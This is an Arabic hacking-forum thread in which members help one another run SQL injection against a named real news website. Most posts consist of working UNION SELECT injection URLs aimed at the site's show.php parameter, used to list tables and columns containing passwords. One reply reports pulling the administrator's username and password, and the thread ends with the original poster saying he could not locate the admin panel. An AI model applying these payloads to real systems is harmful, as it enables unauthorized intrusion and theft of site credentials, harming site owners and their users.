|
مشكلتي الاولى في حقن SQL مشكلة Database error من فضلكم ادخلوا السلام عليكم انا حصلت موقع مصاب وحقنته بس اثناء الحقن واجهتني مشكله مادري وش هي يطلع لي Database error ياليت تشوفونها لي هدفي مو اخترق الموقع واعلق الاندكس ابي بس اعرف حل هالمشكله للمستقبل وللاختراقات القادمة ان شاء الله الى هنا الحقنه شغاله طبعا العمود المصاب تحصلونه جنب عنوان الموقع كود: http://www.alghadnews.com/show.php?id=-2059 UNION SELECT 1,2,3,concat(table_name,0x3a,column_name,0x3a,table_schema),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 +from+information_schema.columns+where+table_name=0x736974657573657273--وهنا بعد مابغيت اطلع اليوزر والباس ظهرت المشكله Database error كود: http://www.alghadnews.com/show.php?id=-2059 UNION SELECT 1,2,3,ConCaT(id,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 +from+siteusers--انتظركم |
اها اخي مشكلتك بسيطة جدا جدا المشكلة انك وضعت بالحقنة ConCaT(id,0x3a,pass) اولا قلي كيف كنت حتجيب اليوزر بهالحقنة ! هذه الحقنة لا تظهر لك سوى الـ id فقط اذا حذفت الباس منها ليش ؟ انتبه منيح على كلمة pass انا استخرجت العواميد بهذه الحقنة وكان اسم عمود الباس هكذا PASSWORD مش pass الحقنة http://www.alghadnews.com/show.php?i...115,%2037%29-- انتبه جيدا اخي فالمعلومات التي ستضعها بالحقنة تكون مأخوذة من الحقنة السابقة طيب نتابع انا تابعت بهذا الجدول ويبدو انه لا يحوي على شيء انظر الحقنة http://www.alghadnews.com/show.php?i...om+siteusers-- طيب شو رايك نعود للأول عند الحقنة http://www.alghadnews.com/show.php?i...115,%2037%29-- ونضيف عليها group_ هكذا الحقنة http://www.alghadnews.com/show.php?i...115,%2037%29-- الان تظهر لنا جميع الجداول التي تحتوي على كلمة %pass% مشفرة وهي siteusers:PASSWORD:alghad_news sms:password:alghad_news testnewsletter:pass:alghad_news users:password:alghad_news نحنا جربنا على الاول طب الان منجرب على غيره لحد ما نوصل للمطلوب نصيحة اخي عندما تكون باول مرحلة وهي للبحث عن الجداول التي تحوي كلمة باس مشفرة ضع group في الحقنة حتى لا تضيع وقت بحقن جدول غير مطلوب ان شاء الله اكون قد وفقت في الشرح |
اقتباس:
كفيت ووفيت بارك الله فيك يا غالي وبالتوفيق تحياتي |
تسلم يا غالي هذا واجبنا |
مشكووور ماقصرت والله يجزاك خير على التوضيح الاكثر من رائع |
شكرا عالشرح و ما قصرتو يا شباب |
هاهو يا غالي إسم الأدمين و الباس http://www.alghadnews.com/show.php?i...2+from+users-- إستعملنا في الحقنة أمر كود PHP: يعني مثل ما قال أخي عبد الله ر نعود إلى أول حقنة و نجد الآتي siteusers:PASSWORD:alghad_news sms:password:alghad_news testnewsletter:pass:alghad_news users:password:alghad_news الملون بالأحمر هو الذي إستعملته أرجو أن تكون قد إستوعبت و إن تستحق شيء فلا تتردد يلّا سلام |
تسلم والله بس اللوحة ماحصلتها |
| الساعة الآن 01:44 AM |
[ vBspiders.Com Network ]